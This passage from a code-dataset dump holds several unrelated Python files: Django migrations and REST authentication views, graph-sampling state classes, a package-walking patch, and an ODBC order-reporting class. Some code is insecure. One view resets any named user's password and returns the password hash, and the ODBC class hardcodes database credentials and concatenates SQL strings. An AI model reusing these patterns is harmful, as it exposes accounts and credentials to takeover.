'/media/'\n","sub_path":"web/code/JobTrak/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"125794690","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('myapp', '0007_delete_user'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Contato',\n fields=[\n ('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),\n ('titulo', models.CharField(verbose_name='Título da Página', max_length=50)),\n ('descricao', models.TextField(verbose_name='Descrição')),\n ],\n options={\n 'verbose_name_plural': 'contato',\n 'verbose_name': 'contato',\n },\n ),\n ]\n","sub_path":"myproject/myapp/migrations/0008_contato.py","file_name":"0008_contato.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"573932162","text":"\"\"\"Stores the state of a sample.\r\n\"\"\"\r\n\r\nfrom typing import List, Dict, Tuple\r\nfrom copy import copy\r\n\r\nimport numpy as np\r\n\r\nclass SampleState():\r\n \"\"\"Stores the state of a sample.\r\n \"\"\"\r\n def __init__(self, sample_size: int) -> None:\r\n \"\"\"Creates a default, empty sample state.\r\n \"\"\"\r\n self.empty = True\r\n self.sample_size = sample_size\r\n self.sample_idx = np.asarray([], dtype=np.int32)\r\n # End of __init__()\r\n\r\n @staticmethod\r\n def create_sample_state(num_vertices: int, prev_state: 'SampleState', args: 'argparse.Namespace') -> 'SampleState':\r\n \"\"\"Performs sampling according to the sample type in args.\r\n \"\"\"\r\n if args.sample_type == \"uniform_random\":\r\n return UniformRandomSampleState(num_vertices, prev_state)\r\n elif args.sample_type == \"random_walk\":\r\n return RandomWalkSampleState(num_vertices, prev_state)\r\n elif args.sample_type == \"random_jump\":\r\n return RandomJumpSampleState(num_vertices, prev_state)\r\n elif args.sample_type == \"degree_weighted\":\r\n return DegreeWeightedSampleState(num_vertices, prev_state)\r\n elif args.sample_type == \"random_node_neighbor\":\r\n return RandomNodeNeighborSampleState(num_vertices, prev_state)\r\n elif args.sample_type == \"forest_fire\":\r\n return ForestFireSampleState(num_vertices, prev_state)\r\n elif args.sample_type == \"expansion_snowball\":\r\n return ExpansionSnowballSampleState(num_vertices, prev_state)\r\n else:\r\n raise NotImplementedError(\"Sample type: {} is not implemented!\".format(args.sample_type))\r\n # End of create_sample()\r\n# End of SampleState\r\n\r\nclass UniformRandomSampleState(SampleState):\r\n def __init__(self, num_vertices: int, prev_state: 'UniformRandomSampleState') -> None:\r\n SampleState.__init__(self, prev_state.sample_size)\r\n self.empty = False\r\n if not prev_state.empty:\r\n self.sample_idx = copy(prev_state.sample_idx)\r\n # End of __init__()\r\n# End of UniformRandomSampleState\r\n\r\nclass RandomWalkSampleState(SampleState):\r\n def __init__(self, num_vertices: int, prev_state: 'RandomWalkSampleState') -> None:\r\n SampleState.__init__(self, prev_state.sample_size)\r\n self.empty = False\r\n self.sampled_marker = [False] * num_vertices\r\n self.index_set = list() # type: List[int]\r\n if not prev_state.empty:\r\n self.sampled_marker = copy(prev_state.sampled_marker)\r\n self.index_set = copy(prev_state.index_set)\r\n self.sample_idx = copy(prev_state.sample_idx)\r\n # End of __init__()\r\n# End of RandomWalkSampleState\r\n\r\nclass RandomJumpSampleState(SampleState):\r\n def __init__(self, num_vertices: int, prev_state: 'RandomJumpSampleState') -> None:\r\n SampleState.__init__(self, prev_state.sample_size)\r\n self.empty = False\r\n self.sampled_marker = [False] * num_vertices\r\n self.index_set = list() # type: List[int]\r\n if not prev_state.empty:\r\n self.sampled_marker = copy(prev_state.sampled_marker)\r\n self.index_set = copy(prev_state.index_set)\r\n self.sample_idx = copy(prev_state.sample_idx)\r\n # End of __init__()\r\n# End of RandomJumpSampleState\r\n\r\nclass DegreeWeightedSampleState(SampleState):\r\n def __init__(self, num_vertices, prev_state: 'DegreeWeightedSampleState') -> None:\r\n SampleState.__init__(self, prev_state.sample_size)\r\n self.empty = False\r\n if not prev_state.empty:\r\n self.sample_idx = copy(prev_state.sample_idx)\r\n # End of __init__()\r\n# End of DegreeWeightedSampleState\r\n\r\nclass RandomNodeNeighborSampleState(SampleState):\r\n def __init__(self, num_vertices: int, prev_state: 'RandomNodeNeighborSampleState') -> None:\r\n SampleState.__init__(self, prev_state.sample_size)\r\n self.empty = False\r\n self.sampled_marker = [False] * num_vertices\r\n self.index_set = list() # type: List[int]\r\n if not prev_state.empty:\r\n self.sample_idx = copy(prev_state.sample_idx)\r\n self.sampled_marker = copy(prev_state.sampled_marker)\r\n self.index_set = copy(prev_state.index_set)\r\n # End of __init__()\r\n# End of RandomNodeNeighborSampleState\r\n\r\nclass ForestFireSampleState(SampleState):\r\n def __init__(self, num_vertices: int, prev_state: 'ForestFireSampleState') -> None:\r\n SampleState.__init__(self, prev_state.sample_size)\r\n self.empty = False\r\n self.sampled_marker = [False] * num_vertices\r\n self.burnt_marker = [False] * num_vertices\r\n self.current_fire_front = [np.random.randint(num_vertices)]\r\n self.next_fire_front = list() # type: List[int]\r\n self.index_set = list() # type: List[int]\r\n if not prev_state.empty:\r\n self.sampled_marker = copy(prev_state.sampled_marker)\r\n self.burnt_marker = copy(prev_state.burnt_marker)\r\n self.current_fire_front = copy(prev_state.current_fire_front)\r\n self.next_fire_front = copy(prev_state.next_fire_front)\r\n self.index_set = copy(prev_state.index_set)\r\n self.sample_idx = copy(prev_state.sample_idx)\r\n # End of __init__()\r\n# End of ForestFireSampleState\r\n\r\nclass ExpansionSnowballSampleState(SampleState):\r\n def __init__(self, num_vertices: int, prev_state: 'ExpansionSnowballSampleState') -> None:\r\n SampleState.__init__(self, prev_state.sample_size)\r\n self.empty = False\r\n self.start = np.random.randint(num_vertices)\r\n self.index_flag = [False] * num_vertices\r\n self.index_flag[self.start] = True\r\n self.index_set = [self.start]\r\n self.neighbors = list() # type: List[int]\r\n self.neighbors_flag = [False] * num_vertices\r\n self.contribution = [0] * num_vertices\r\n if not prev_state.empty:\r\n self.start = copy(prev_state.start)\r\n self.index_flag = copy(prev_state.index_flag)\r\n self.index_set = copy(prev_state.index_set)\r\n self.neighbors = copy(prev_state.neighbors)\r\n self.neighbors_flag = copy(prev_state.neighbors_flag)\r\n self.contribution = copy(prev_state.contribution)\r\n self.sample_idx = copy(prev_state.sample_idx)\r\n # End of __init__()\r\n# End of ExpansionSnowballSampleState\r\n","sub_path":"StochasticBlockPartition/code/python/samplestate.py","file_name":"samplestate.py","file_ext":"py","file_size_in_byte":6379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"285842255","text":"import sys\nimport venusian\n\n# A fixed version of venusian walk_packages so that we can property\n# ignore things\ndef walk_packages(path=None, prefix='', onerror=None, ignore=None):\n \"\"\"Yields (module_loader, name, ispkg) for all modules recursively\n on path, or, if path is None, all accessible modules.\n\n 'path' should be either None or a list of paths to look for\n modules in.\n\n 'prefix' is a string to output on the front of every module name\n on output.\n\n Note that this function must import all *packages* (NOT all\n modules!) on the given path, in order to access the __path__\n attribute to find submodules.\n\n 'onerror' is a function which gets called with one argument (the name of\n the package which was being imported) if any exception occurs while\n trying to import a package. If no onerror function is supplied, any\n exception is exceptions propagated, terminating the search.\n\n 'ignore' is a function fed a fullly dotted name; if it returns True, the\n object is skipped and not returned in results (and if it's a package it's\n not imported).\n\n Examples:\n\n # list all modules python can access\n walk_packages()\n\n # list all submodules of ctypes\n walk_packages(ctypes.__path__, ctypes.__name__+'.')\n\n # NB: we can't just use pkgutils.walk_packages because we need to ignore\n # things\n \"\"\"\n def seen(p, m={}):\n if p in m: # pragma: no cover\n return True\n m[p] = True\n\n # iter_modules is nonrecursive\n for importer, name, ispkg in venusian.iter_modules(path, prefix):\n\n if ignore is not None and ignore(name):\n # if name is a package, ignoring here will cause\n # all subpackages and submodules to be ignored too\n continue\n\n # do any onerror handling before yielding\n\n if ispkg:\n try:\n __import__(name)\n except Exception:\n if onerror is not None:\n onerror(name)\n else:\n raise\n else:\n yield importer, name, ispkg\n path = getattr(sys.modules[name], '__path__', None) or []\n\n # don't traverse path items we've seen before\n path = [p for p in path if not seen(p)]\n\n for item in walk_packages(path, name+'.', onerror, ignore):\n yield item\n else:\n yield importer, name, ispkg\n","sub_path":"IxiaCR/ixiacr/patches/venusian_patch.py","file_name":"venusian_patch.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"64113895","text":"from django.shortcuts import render\nfrom .models import User\nfrom .serializers import RegisterSerializer, LoginSerializer, AccessToken, ChangePasswordSerializer, ChangeProfileSerializer, UserSerializer, UpdateUserSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom django.contrib.auth import login,logout\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework_simplejwt.token_blacklist.models import BlacklistedToken, OutstandingToken\nfrom rest_framework import status\nfrom rest_framework.permissions import IsAuthenticated\nfrom .permissions import IsSuperUser\n# from django.contrib.auth.\n# Create your views here.\nclass RegisterView(APIView):\n permission_classes=(IsAuthenticated,IsSuperUser,)\n def post(self, request):\n serializer=RegisterSerializer(data=request.data)\n if serializer.is_valid():\n user=serializer.save()\n response={\n \"username\": user.username,\n 'status_code':201,\n }\n return Response(response, status=201)\n return Response(serializer.errors, status=200)\n\nclass LoginView(APIView):\n permission_classes=(AllowAny,)\n def post(self, request):\n serializer=LoginSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n\n user=serializer.validated_data['user']\n login(request, user)\n access=AccessToken.for_user(user)\n respone={\n \"id\":user.id,\n \"username\":user.username,\n \"superuser\":user.is_superuser,\n \"admin\":user.is_staff,\n \"status_code\": 200,\n \"token\": str(access)\n \n }\n\n return Response(respone, status=200)\n\n\nclass LogoutView(APIView):\n \n def post(self, request):\n tokens = OutstandingToken.objects.filter(user_id=request.user.id)\n for token in tokens:\n BlacklistedToken.objects.get_or_create(token=token)\n logout(request)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\nclass CheckToken(APIView):\n def get(self, request):\n access=request.data['access']\n if AccessToken(access).check_blacklist():\n return Response({\"token\":\"token in blacklisted\", \"status_code\": 403}, status= 403)\n return Response({\"token\":access, \"status_code\": 200}, status=200)\n\nclass ChangePasswordView(APIView):\n def put(self, request):\n password=request.data['password']\n username=request.data['username']\n user=User.objects.get(username=username)\n serializer = ChangePasswordSerializer(data=request.data)\n if serializer.is_valid():\n user.set_password(password)\n user.save()\n response={\n 'username':user.username,\n 'password':user.password,\n 'status_code':200\n }\n return Response(response, status=200)\n return Response(serializer.errors, status=200)\n\nclass ChangeProfileView(APIView):\n def get(self, request, username):\n # username=request.data['username']\n user=User.objects.get(username=username) \n serializer=ChangeProfileSerializer(user)\n if serializer:\n response={\n \"data\":serializer.data,\n \"status_code\": 200\n }\n return Response(response, status=200)\n return Response({\"detai\":\"error\", \"status_code\":400}, status=200)\n def put(self, request, username):\n # username=request.data['username']\n user=User.objects.get(username=username)\n serializer=ChangeProfileSerializer(user, data=request.data)\n if serializer.is_valid():\n serializer.save()\n response={\n \"user\":serializer.data,\n \"status_code\": 200\n }\n return Response(response, status=200)\n return Response(serializer.errors, status=200)\n\nclass UserView(APIView):\n permission_classes=(IsSuperUser,)\n def get(self, request):\n user=User.objects.all()\n serializer = UserSerializer(user, many=True)\n response={\n 'data':serializer.data,\n 'status_code':status.HTTP_200_OK\n }\n return Response(response, status=status.HTTP_200_OK)\n\nclass UpdateUserView(APIView):\n permission_classes=(IsSuperUser,)\n def get(self, request, username):\n # username=request.data['username']\n user=User.objects.get(username=username) \n serializer=UpdateUserSerializer(user)\n if serializer:\n response={\n \"data\":serializer.data,\n \"status_code\": 200\n }\n return Response(response, status=200)\n return Response({\"detai\":\"error\", \"status_code\":400}, status=200)\n\n def put(self, request, username):\n # username=request.data['username']\n user=User.objects.get(username=username)\n serializer=UpdateUserSerializer(user, data=request.data)\n if serializer.is_valid():\n serializer.save()\n response={\n \"data\":serializer.data,\n \"status_code\": 200\n }\n return Response(response, status=200)\n return Response(serializer.errors, status=400)","sub_path":"authentication/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"340837531","text":"#!/usr/bin/env python3\nimport numpy as np \n# import matplotlib.pyplot as plt\n# data = np.random.normal(size = (5,100000))*100\n# fig,ax = plt.subplots()\n# ax.hist(data[0], 40, normed = 1, histtype = 'bar', facecolor = 'yellowgreen', alpha = 0.5)\n# ax.set_title('pdf')\n# plt.show()\ntemperature_file = '/home/hadoop/homework/Parallel-Computing/project4/data/Temperature.txt'\ncity_number = 5\ntime_step = 10000000\nfo = open(temperature_file, \"w\")\n \nfor city in range(city_number):\n for _ in range(time_step):\n fo.write(\"%d\\t %.5f\\n\"%(city, np.random.normal(1)*100))\n\nfo.close()\n","sub_path":"Parallel-Computing/project4/src/data_generater.py","file_name":"data_generater.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"602609430","text":"from turbodbc import connect\nimport datetime\nimport ttp\n\nclass DBConnect:\n orderstart = ''\n orderend = ''\n orderstotal = ''\n datestart = ''\n datemin = ''\n datemax = ''\n db = {}\n fields = {}\n fix = {}\n translate = {}\n\n def __init__(self):\n ##create connection to DB\n connection = connect(dsn='live', uid='sysprogress', pwd='123')\n self.cursor = connection.cursor()\n #return self.cursor\n\n def setdb(self, db):\n self.db = db\n\n def setfields(self, fields):\n self.fields = fields\n\n def setfix(self, fix):\n self.fix = fix\n\n def settranslate(self, translate):\n self.translate = translate\n\n def DBGet(self, select):\n #def odbcSelect(cursor, select):\n self.cursor.execute(select)\n return self.cursor\n\n selname = {'cono': 'Company', 'whse': 'Whse', 'name': 'MFG', 'prod': 'Product', 'descrip': 'Description', 'qtyavail': 'Avalable', 'qtyonhand': 'OnHand',\n 'qtyreservd': 'qtyReserved', 'qtycommit': 'qtyCommit', 'qtybo': 'qtyBO', 'qtyintrans': 'qtyInTransit', 'qtyonorder': 'qtyOnOrder', 'safeallamt': 'safeallamt', 'orderpt': 'orderpt', 'linept': 'linept', 'lastcost': 'lastcost', 'baseprice': 'baseprice',\n 'addoncost': 'AddOnCost', 'transdt': 'transdt', 'lastpowtdt': 'lastpowtdt', 'shipprod': 'Product', 'transtype': 'Order Type', 'qtyord': 'QtyOrd', 'DlrAmt$': 'Amount', 'orderno': 'Order',\n 'enterdt': 'entDate', 'custpo': 'PO#', 'totlineord': 'Total Order', 'totqtyord': 'QtyTotal', 'totweight': 'totWeight'}\n #'lastrcptdt', 'lastcntdt', 'leadtmavg'}\n\n def __namesDic(self, sel):\n sel = sel.replace(\"SELECT \", \"\")\n DBnames = sel.split(',')\n for x in range(len(DBnames)):\n if 'AS ' in DBnames[x]:\n discard, DBnames[x] = DBnames[x].split('AS ')\n DBnames[x] = DBnames[x].replace(\"'\", '')\n DBnames[x] = DBnames[x].replace(\" \", '')\n else:\n discard, DBnames[x] = DBnames[x].split('.', 1)\n DBnames[x] = DBnames[x].replace(\" \", '')\n #print(DBnames)\n FriendlyNames = self.__namesTanslate(DBnames)\n return FriendlyNames\n \n def __namesTanslate(self, DBnames):\n for x in range(len(DBnames)):\n if DBnames[x] in self.selname:\n DBnames[x] = self.selname[DBnames[x]]\n #else:\n # DBnames[x] = \"No Name Match\"\n #print(DBnames)\n return DBnames\n\n\n#New method\n def __fix(self, row):\n fix = self.fix\n for r in fix:\n if fix[r] == \"date\":\n row[r] = ttp.mmddyyyy(row[r])\n elif fix[r] == \"upper\":\n toupper = row[r]\n row[r] = toupper.upper()\n #int, float\n return row\n\n def __translate(self, row):\n translate = self.translate\n for name in translate:\n if row[name] in translate[name]:\n row[name] = translate[name][row[name]]\n return row\n \n def __getrecords(self):\n db = self.db\n fields = self.fields\n select = (db[\"odbcselect\"] + db[\"odbcfrom\"] + db[\"odbcwhere\"] + db[\"odbcorder\"])\n c = self.cursor.execute(select)\n count = 0\n data = []\n for row in c:\n #print(row)\n itemno = 0\n rowd = {}\n for name in fields[\"names\"]:\n rowd[fields[\"names\"][name]] = row[itemno]\n itemno += 1\n #if 'fix' in db:\n if bool(self.fix):\n rowd = self.__fix(rowd) #fix the data format\n if bool(self.translate):\n rowd = self.__translate(rowd) #translate the data as needed\n #print(rowf)\n data.append(rowd)\n count += 1\n return data #array of dics\n\n ordhdrData = {}\n def getrecords(self):\n data = self.__getrecords()\n return data\n\n#Old Crap needs to convert\n\n ordersData = {}\n def orders(self):\n odbcsel = \"SELECT arsc_0.name, oeeh_0.enterdt, oeeh_0.orderno, oeeh_0.transtype, oeeh_0.custpo, oeeh_0.totlineord, oeeh_0.totqtyord, oeeh_0.totweight \"\n odbcfrom = \"FROM NXT.PUB.arsc arsc_0, NXT.PUB.oeeh oeeh_0 \"\n odbcwhere = \"WHERE arsc_0.custno = oeeh_0.custno AND arsc_0.cono = oeeh_0.cono AND ((oeeh_0.stagecd<9) AND (oeeh_0.orderno>\" + self.orderstart + \")) \"\n odbcorder = \"ORDER BY arsc_0.name, oeeh_0.enterdt, oeeh_0.orderno\"\n select = odbcsel + odbcfrom + odbcwhere + odbcorder\n names = self.__namesDic(odbcsel)\n oData = {}\n \"\"\"\n oData(order by cust) = {Cust{\n orderno: [date, order type, PO#, orderttl, quantyttl, weightttl]\n }\n }\n \"\"\"\n orderNumbers = []\n daterange = []\n c = self.cursor.execute(select)\n count = 0\n hashit = {}\n for row in c:\n # Company,1 Date,2 Order Number,3 Order Type,4 Purchase Order Number,5 $ For order,6 Quantity Total,7 Weight Total,8\n #create array to add to dic\n line = []\n orderNumbers.append(row[2])\n toupper = row[3]\n row[3] = toupper.upper()\n oDate = row[1]\n daterange.append(oDate)\n row[1] = ttp.mmddyyyy(oDate)\n line = (row[1], row[3], row[4], row[5], row[6], float(row[7]))\n #build dic of dic of dic of dic, it just goes on and on\n if not row[0] in oData:\n oData[row[0]] = {}\n if not row[2] in oData[row[0]]:\n oData[row[0]][row[2]] = {}\n oData[row[0]][row[2]] = line\n hashit[count] = {}\n for x in range(len(row)):\n hashit[count][names[x]] = row[x]\n count += 1\n #print(hashit)\n #get last order#\n orderNumbers.sort()\n self.orderend = orderNumbers[-1]\n self.orderstotal = len(orderNumbers)\n maxd = max(daterange)\n self.datemax = maxd\n mind = min(daterange)\n self.datemin = mind\n\n orderNumbers.sort()\n stuff = {}\n #print(orderNumbers)\n stuff['orderstart'] = orderNumbers[0]\n stuff['orderend'] = orderNumbers[-1]\n stuff['orderstotal'] = len(orderNumbers)\n maxd = max(daterange)\n stuff['datemax'] = maxd\n mind = min(daterange)\n stuff['datemin'] = mind\n stuff['count'] = count\n self.ordersData['info'] = stuff\n self.ordersData['data'] = oData\n #return oData\n\n backordersData = {}\n def backorders(self):\n select = \"SELECT arsc_0.name, oeeh_0.enterdt, oeeh_0.orderno, oeeh_0.transtype, oeeh_0.custpo, oeeh_0.totlineord, oeeh_0.totqtyord, oeeh_0.totweight, oeeh_0.stagecd, oeeh_0.ordersuf, oeeh_0.shiptonm, oeeh_0.reqshipdt, oeeh_0.promisedt \" \\\n \"FROM NXT.PUB.arsc arsc_0, NXT.PUB.oeeh oeeh_0 \" \\\n \"WHERE arsc_0.custno = oeeh_0.custno AND arsc_0.cono = oeeh_0.cono AND ((oeeh_0.stagecd<4) AND (oeeh_0.ordersuf>0)) \" \\\n \"ORDER BY arsc_0.name, oeeh_0.enterdt, oeeh_0.orderno\"\n data = {}\n datax = {}\n \"\"\"\n oData(order by cust) = {Cust:{\n date:{ order: [ordersuf, type, PO#, orderttl, quantyttl, weightttl]\n }\n }\n \"\"\"\n #datax['header'] = ['Company:30', 'Date:11', 'OrderNo:9', 'Suffix:6', 'Order Type:10', 'PO#:20', 'OrderTotal:11', 'QtyTotal:8', 'WgtTotal:9']\n #datax['name'] = 'Backorders'\n #datax['freeze'] = 0\n orderNumbers = []\n daterange = []\n count = 0\n c = self.cursor.execute(select)\n for row in c:\n #print(row)\n count += 1\n line = []\n orderNumbers.append(row[2])\n toupper = row[3]\n row[3] = toupper.upper()\n oDate = row[1]\n daterange.append(oDate)\n row[1] = ttp.mmddyyyy(oDate)\n line = (row[9], row[3], row[4], row[5], row[6], row[7])\n #build dic of dic of dic of dic, it just goes on and on\n if not row[0] in data:\n data[row[0]] = {}\n if not row[1] in data[row[0]]:\n data[row[0]][row[1]] = {}\n data[row[0]][row[1]][row[2]] = line\n #biuld info\n orderNumbers.sort()\n stuff = {}\n stuff['orderstart'] = orderNumbers[0]\n stuff['orderend'] = orderNumbers[-1]\n stuff['orderstotal'] = len(orderNumbers)\n maxd = max(daterange)\n stuff['datemax'] = maxd\n mind = min(daterange)\n stuff['datemin'] = mind\n stuff['count'] = count\n datax['info'] = stuff\n datax['data'] = data\n return datax\n\n openUninvoicedOrdersData = {}\n def openUninvoicedOrders(self):\n select = \"SELECT arsc_0.name, oeeh_0.enterdt, oeeh_0.orderno, oeeh_0.transtype, oeeh_0.custpo, oeeh_0.totlineord, oeeh_0.totqtyord, oeeh_0.totweight, oeeh_0.stagecd, oeeh_0.shiptonm, oeeh_0.ordersuf, oeeh_0.reqshipdt, oeeh_0.promisedt \" \\\n \"FROM NXT.PUB.arsc arsc_0, NXT.PUB.oeeh oeeh_0 \" \\\n \"WHERE arsc_0.custno = oeeh_0.custno AND arsc_0.cono = oeeh_0.cono AND ((oeeh_0.stagecd < 4 )) \" \\\n \"ORDER BY oeeh_0.stagecd, arsc_0.name, oeeh_0.enterdt, oeeh_0.orderno\"\n oData = {}\n \"\"\"\n oData(order by cust) = {Cust:{\n date:{order: [type, PO#, orderttl, quantyttl, weightttl, stage, ordersuf, shiptonm]\n }\n }\n \"\"\"\n self.openUninvoicedOrdersData['header'] = ['Company:30', 'Date:11', 'OrderNo:9', 'Suffix:9', 'Order Type:10', 'Stage:12', 'ShiptoNM:35', 'PO#:20', 'OrderTotal:11', 'qtyTotal:8', 'WtTotal:9', \"ReqShipDT:11\", \"PromiseDT:11\"]\n self.openUninvoicedOrdersData['name'] = 'openUninvoicedOrders'\n self.openUninvoicedOrdersData['freeze'] = 0\n orderNumbers = []\n daterange = []\n count = 0\n stage = { 0: 'Quote',\n 1: 'Ordered',\n 2: 'Picked',\n 3: 'Shipped',\n 4: 'Invoiced'}\n c = self.cursor.execute(select)\n for row in c:\n count += 1\n line = []\n orderNumbers.append(row[2])\n toupper = row[3]\n row[3] = toupper.upper()\n oDate = row[1]\n daterange.append(oDate)\n row[1] = ttp.mmddyyyy(oDate)\n row[8] = stage[row[8]] \n row[11] = ttp.mmddyyyy(row[11])\n row[12] = ttp.mmddyyyy(row[12])\n line = (row[1], row[9], row[10], row[3], row[8], row[4], row[5], row[6], row[7], row[11], row[12])\n #build dic of dic of dic of dic, it just goes on and on\n if not row[0] in oData:\n oData[row[0]] = {}\n if not row[1] in oData[row[0]]:\n oData[row[0]][row[1]] = {}\n oData[row[0]][row[1]][row[2]] = line\n #biuld info\n orderNumbers.sort()\n stuff = {}\n stuff['orderstart'] = orderNumbers[0]\n stuff['orderend'] = orderNumbers[-1]\n stuff['orderstotal'] = len(orderNumbers)\n maxd = max(daterange)\n stuff['datemax'] = maxd\n mind = min(daterange)\n stuff['datemin'] = mind\n stuff['count'] = count\n self.openUninvoicedOrdersData['info'] = stuff\n self.openUninvoicedOrdersData['data'] = oData\n\n customerProductData = {}\n def customerProduct(self):\n odbcsel = \"SELECT oeel_0.whse, oeel_0.transtype, arsc_0.name, oeel_0.shipprod, oeel_0.qtyord, oeel_0.qtyord*oeel_0.price AS 'DlrAmt$', oeel_0.orderno \"\n #odbcfrom = \"FROM NXT.PUB.arsc arsc_0, NXT.PUB.oeel oeel_0 \"\n #odbcwhere = \"WHERE arsc_0.custno = oeel_0.custno AND arsc_0.cono = oeel_0.cono AND ((oeel_0.orderno>\" + self.orderstart + \")) \"\n #odbcorder = \"ORDER BY oeel_0.whse, oeel_0.transtype, arsc_0.name, oeel_0.shipprod\"\n\n\n #odbcsel = \"SELECT oeel_0.whse, oeeh_0.stagecd, oeel_0.transtype, oeel_0.orderno, oeel_0.ordersuf, arsc_0.name, oeel_0.shipprod, oeel_0.qtyord, oeel_0.qtyord*oeel_0.price AS 'DlrAmt$' \"\"\n odbcfrom = \"FROM NXT.PUB.arsc arsc_0, NXT.PUB.oeeh oeeh_0, NXT.PUB.oeel oeel_0 \"\n odbcwhere = \"WHERE oeeh_0.orderno = oeel_0.orderno AND oeeh_0.ordersuf = oeel_0.ordersuf AND oeeh_0.custno = arsc_0.custno AND oeel_0.custno = oeeh_0.custno AND ((oeel_0.orderno>\" + self.orderstart + \") AND (oeeh_0.stagecd<9)) \"\n odbcorder = \"ORDER BY oeel_0.whse, oeel_0.transtype, arsc_0.name, oeel_0.shipprod\"\n select = odbcsel + odbcfrom + odbcwhere + odbcorder\n names = self.__namesDic(odbcsel)\n cData = {}\n \"\"\"\n cData(order summary) = {Whse{\n Type{\n Customer{\n prod: enterdt: [qtyord, price] \n }\n }\n }\n }\n \"\"\"\n #orderNumbers = []\n #daterange = []\n count = 0\n c = self.cursor.execute(select)\n for row in c:\n toupper = row[1]\n row[1] = toupper.upper()\n #build dic of dic of dic of dic, it just goes on and on\n #whse\n if not row[0] in cData:\n cData[row[0]] = {}\n #type \n if not row[1] in cData[row[0]]: \n cData[row[0]][row[1]] = {}\n #customer\n if not row[2] in cData[row[0]][row[1]]: \n cData[row[0]][row[1]][row[2]] = {}\n #shipprod\n if not row[3] in cData[row[0]][row[1]][row[2]]: \n cData[row[0]][row[1]][row[2]][row[3]] = {}\n cData[row[0]][row[1]][row[2]][row[3]] = [int(row[4]), float(row[5])]\n else:\n cData[row[0]][row[1]][row[2]][row[3]][0] += int(row[4])\n cData[row[0]][row[1]][row[2]][row[3]][1] += float(row[5])\n count += 1\n #orderNumbers.sort()\n stuff = {}\n #print(orderNumbers)\n #stuff['orderstart'] = orderNumbers[0]\n #stuff['orderend'] = orderNumbers[-1]\n #stuff['orderstotal'] = len(orderNumbers)\n #maxd = max(daterange)\n #stuff['datemax'] = maxd\n #mind = min(daterange)\n #stuff['datemin'] = mind\n stuff['count'] = count\n self.customerProductData['info'] = stuff\n self.customerProductData['data'] = cData\n #return cData\n\n productData = {}\n def product(self):\n odbcsel = \"SELECT oeel_0.whse, oeel_0.shipprod, oeel_0.qtyord, oeel_0.qtyord*oeel_0.price AS 'DlrAmt$' \" \n #other = \"FROM NXT.PUB.arsc arsc_0, NXT.PUB.oeel oeel_0 \"\n #where = \"WHERE arsc_0.custno = oeel_0.custno AND arsc_0.cono = oeel_0.cono AND ((oeel_0.orderno>\" + self.orderstart + \")) \"\n order = \"ORDER BY oeel_0.whse, oeel_0.transtype, arsc_0.name, oeel_0.shipprod\"\n sfrom = \"FROM NXT.PUB.arsc arsc_0, NXT.PUB.oeeh oeeh_0, NXT.PUB.oeel oeel_0 \"\n #sfrom = \"FROM NXT.PUB.icsw icsw_0, NXT.PUB.apsv apsv_0, NXT.PUB.arsc arsc_0, NXT.PUB.oeeh oeeh_0, NXT.PUB.oeel oeel_0 \"\n where = \"WHERE oeeh_0.orderno = oeel_0.orderno AND oeeh_0.ordersuf = oeel_0.ordersuf AND oeeh_0.custno = arsc_0.custno AND oeel_0.custno = oeeh_0.custno AND ((oeel_0.orderno>\" + self.orderstart + \") AND (oeeh_0.stagecd<9)) \"\n select = odbcsel + sfrom + where + order\n names = self.__namesDic(odbcsel)\n \"\"\" dic Format\n sData(order summary) = {whse:\n prod: [qtyord-2, amount-3]\n }\n \"\"\"\n data = {}\n c = self.cursor.execute(select)\n for row in c:\n row[2] = int(row[2])\n #whse\n if not row[0] in data:\n data[row[0]] = {}\n #prod \n if not row[1] in data[row[0]]: \n data[row[0]][row[1]] = [int(row[2]), float(row[3])]\n else:\n data[row[0]][row[1]][0] += int(row[2])\n data[row[0]][row[1]][1] += float(row[3])\n self.productData = data\n\n productInv = {}\n\n def getproductinv(self):\n odbcsel = \"SELECT icsw_0.cono, icsw_0.whse, apsv_0.name, icsw_0.prod, icsp_0.descrip, icsw_0.qtyonhand-icsw_0.qtyreservd-icsw_0.qtycommit AS ' qtyavail ', icsw_0.qtyonhand, \" \\\n \" icsw_0.qtyreservd, icsw_0.qtycommit, icsw_0.qtybo, icsw_0.qtyintrans, icsw_0.qtyonorder, icsw_0.safeallamt, icsw_0.orderpt, icsw_0.linept, icsw_0.lastcost, icsw_0.baseprice,\" \\\n \" icsw_0.addoncost, icsw_0.transdt, icsw_0.lastpowtdt, icsw_0.lastrcptdt, icsw_0.lastcntdt, icsw_0.leadtmavg \"\n names = self.__namesDic(odbcsel)\n c = self.cursor.execute( odbcsel +\"FROM NXT.PUB.apsv apsv_0, NXT.PUB.icsp icsp_0, NXT.PUB.icsw icsw_0 WHERE icsw_0.arpvendno = apsv_0.vendno AND icsw_0.prod = icsp_0.prod AND ((icsw_0.cono = 10)) AND ((icsw_0.whse = 10)) AND ((apsv_0.cono = 10)) ORDER BY icsw_0.cono, icsw_0.whse, apsv_0.name, icsw_0.prod\")\n #\"FROM NXT.PUB.apsv apsv_0, NXT.PUB.icsp icsp_0, NXT.PUB.icsw icsw_0 WHERE icsw_0.arpvendno = apsv_0.vendno AND icsw_0.prod = icsp_0.prod ORDER BY icsw_0.cono, icsw_0.whse, apsv_0.name, icsw_0.prod\")\n self.productInv['header'] = [\"cono\", \"whse\", \"MFG\", 